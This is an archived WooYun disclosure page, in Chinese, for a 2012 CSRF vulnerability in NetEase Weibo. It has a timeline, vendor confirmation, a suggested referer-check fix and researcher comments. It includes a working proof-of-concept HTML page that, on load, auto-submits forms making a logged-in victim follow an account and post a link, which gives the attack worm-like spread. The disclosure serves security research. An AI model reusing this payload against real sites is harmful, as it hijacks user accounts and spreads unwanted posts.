网易微博CSRF漏洞–可造成蠕虫

漏洞概要

缺陷编号:WooYun-2012-05709

漏洞标题:网易微博CSRF漏洞--可造成蠕虫

相关厂商:网易

漏洞作者:PiaCa

提交时间:2012-04-01 00:19

公开时间:2012-05-16 00:20

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-04-01: 细节已通知厂商并且等待厂商处理中
2012-04-05: 厂商已经确认,细节仅向厂商公开
2012-04-15: 细节向核心白帽子及相关领域专家公开
2012-04-25: 细节向普通白帽子公开
2012-05-05: 细节向实习白帽子公开
2012-05-16: 细节向公众公开

简要描述:

网易微博CSRF漏洞PS:貌似老早就被人发到wooyun上了,难道我穿越了…………
虽然失眠,精力不好(此处省略1w字)。但应该还是漏洞的。

详细说明:

PS:貌似老早就被人发到wooyun上了,难道我穿越了…………1、登陆http://t.163.com2、访问http://50.19.159.231/163.html3、回到微博首页,自动发微博加关注

漏洞证明:

<html><head><title>163 weibo csrf test</title><script type="text/javascript">//follow mefunction addF(){document.getElementById("addF").submit();}//add twitterfunction addT(){document.getElementById("addT").submit();}</script></head><body onload="addF();addT();"><form target="addFF" method="POST" action="http://t.163.com/relation.do?method=follow"><input type="text" name="userId" value="-648356100822396112"><input type="submit" value="go"></form><form target="addTF" method="POST" action="http://t.163.com/tweet.do?method=addTweet"><input type="text" name="content" value="http://163.fm/8tvLr0f"><input type="submit" value="go"></form><iframe name="addFF"></iframe><iframe name="addTF"></iframe></body></html>

修复方案:

检查referer

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-04-05 10:35

厂商回复:

感谢您对网易的关注,已经修复

最新状态:

暂无

评价

  1. 2010-01-01 00:00 水滴 白帽子 | Rank:146 漏洞数:24)

    迅雷网盘也有

  2. 2010-01-01 00:00 Z-0ne 白帽子 | Rank:499 漏洞数:39)

    利用起来真是可大可小

  3. 2010-01-01 00:00 凤凰 白帽子 | Rank:15 漏洞数:5)

    CSRF是跨站请求伪造吧?

  4. 2010-01-01 00:00 1cefish 白帽子 | Rank:47 漏洞数:12)

    貌似很多地方都有 这些大门户都在做什么0 0

  5. 2010-01-01 00:00 exploits 白帽子 | Rank:52 漏洞数:8)

    越大的站 漏洞越多, 安全越不可靠,中国的安全,真伤不起

  6. 2010-01-01 00:00 unic02n 白帽子 | Rank:48 漏洞数:6)

    所以,一个好的检测系统或者体系是非常重要的,尤其是这些子站无数的大站。piaca牛v5!

  7. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    坐等真相。

  8. 2010-01-01 00:00 PiaCa 白帽子 | Rank:129 漏洞数:10)

    @unic02n 您老谦虚了